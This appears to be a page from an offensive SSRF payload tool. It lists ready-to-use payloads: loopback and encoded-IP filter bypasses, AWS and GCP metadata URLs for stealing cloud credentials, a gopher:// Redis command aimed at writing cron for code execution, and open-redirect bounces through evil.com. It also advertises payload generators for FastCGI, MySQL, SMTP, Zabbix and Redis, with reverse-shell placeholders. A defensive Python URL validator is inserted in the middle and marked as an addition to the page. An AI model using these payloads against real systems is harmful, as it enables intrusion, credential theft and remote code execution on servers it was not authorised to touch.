
SSRF Exploitation and Advanced Payloads

Payload Library

Below are selected payloads chosen not only for their ability to generate a response, but for their tactical value in different exploitation scenarios. Each one includes technical context and guidance on when to use it.

  • 1. Local access to internal services:

    These payloads attempt to connect to internal services bound to localhost or loopback addresses. Their purpose is to evaluate whether the server can access protected ports such as localhost:8000, where administrative interfaces, Redis, MongoDB, etc. often run.

    http://127.0.0.1:8000
    http://localhost:8080/admin
    http://[::1]:9200/ (IPv6 to Elasticsearch)
  • 2. Validation bypass using alternative formats:

    Some defenses rely on detecting exact strings like 127.0.0.1 without considering alternative representations. These payloads bypass filters using decimal, hexadecimal, or octal encoding.

    http://2130706433 (127.0.0.1 in decimal)
    http://0x7f000001 (Hexadecimal)
    http://0177.0000.0000.0001 (Octal)
  • 3. Cloud provider metadata access:

    These endpoints are exclusive to cloud services such as AWS, GCP, or Azure. Accessing them may allow attackers to steal IAM tokens, API keys, or temporary credentials.

    http://169.254.169.254/latest/meta-data/ (AWS)
    http://metadata.google.internal/computeMetadata/v1/ (GCP)
  • 4. SSRF to RCE via Redis (Gopher):

    This payload uses the gopher:// protocol to communicate with Redis as if it were a client. It is useful in scenarios where Redis has no authentication and its content can be manipulated, for example to write commands into cron.

    gopher://127.0.0.1:6379/_%2A3%0D%0A%246%0D%0ASET%0D%0A%24%34%0D%0Acron%0D%0A%24%32%0D%0Aid%0D%0A
  • 5. Redirects and request bouncing:

    Some servers allow redirections from a legitimate URL to an internal one. This type of payload attempts to exploit intermediate hosts with open redirect behavior.

    http://example.com/redirect?to=http://127.0.0.1:80
    http://evil.com/forward?next=http://169.254.169.254
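
Seen from the defending side, every class above is caught by a fetcher that restricts the scheme and normalises the host before judging it. The following is an added example, not part of the original page or its tool: `check_url`, `legacy_ipv4` and the injectable `resolve` callback are hypothetical names, and the block goes slightly beyond the listed payloads by also handling short dotted forms and IPv4-mapped IPv6.

```python
import ipaddress
import re
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # gopher://, file:// and others are refused
_FIELD = re.compile(r"0[xX][0-9a-fA-F]+|[0-9]+")

def _num(part):
    """Parse one inet_aton-style field: 0x.. is hex, a leading 0 is octal, else decimal."""
    if not _FIELD.fullmatch(part):
        raise ValueError(part)
    if part[:2].lower() == "0x":
        return int(part, 16)
    return int(part, 8) if len(part) > 1 and part[0] == "0" else int(part)

def legacy_ipv4(host):
    """Return the IPv4Address a lenient (inet_aton-style) parser derives from host, else None."""
    fields = host.split(".")
    try:
        *head, last = [_num(f) for f in fields]
    except ValueError:
        return None
    if len(fields) > 4 or any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    return ipaddress.IPv4Address(last + sum(n << (8 * (3 - i)) for i, n in enumerate(head)))

def system_resolve(host):
    return [ai[4][0] for ai in socket.getaddrinfo(host, None)]

def check_url(url, resolve=system_resolve):
    """Return (allowed, reason) for a user-supplied URL the server is about to fetch."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if parts.scheme not in ALLOWED_SCHEMES or not host:
        return False, "scheme or host not allowed"
    try:
        if (ip := legacy_ipv4(host)) is not None:
            addrs = [ip]
        else:  # IPv6 literal, or a DNS name that must be resolved before it is judged
            names = [host] if ":" in host else resolve(host)
            addrs = [ipaddress.ip_address(a) for a in names]
    except (ValueError, OSError):
        return False, "host did not resolve"
    for addr in addrs:
        addr = getattr(addr, "ipv4_mapped", None) or addr  # unwrap ::ffff:a.b.c.d
        if not addr.is_global:
            return False, f"{addr} is not a public address"
    return (True, "ok") if addrs else (False, "host did not resolve")
```

Run the same check on every redirect `Location` with automatic redirect following disabled, and connect to the address that was validated rather than resolving the name a second time.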

Advanced Payloads

FastCGI RCE Payload Generator

Generate a payload to exploit FastCGI (port 9000) via SSRF.

GitHub Payload Generator

Generate a payload to exploit GitHub via SSRF.

MySQL Payload Generator

Generate a payload to exploit MySQL via SSRF.

ReadFiles Payload Generator

Generate a payload to exploit file reading via SSRF.

SMTP Payload Generator

Generate a payload to exploit SMTP via SSRF.

Custom Payload (Template)

Generate custom Gopher payloads for any internal service.

Use SERVER_HOST and SERVER_PORT as placeholders for reverse shell

Zabbix Payload Generator

Generate a payload to exploit Zabbix via SSRF.

Redis Payload Generator

Generate a payload to exploit Redis via SSRF.
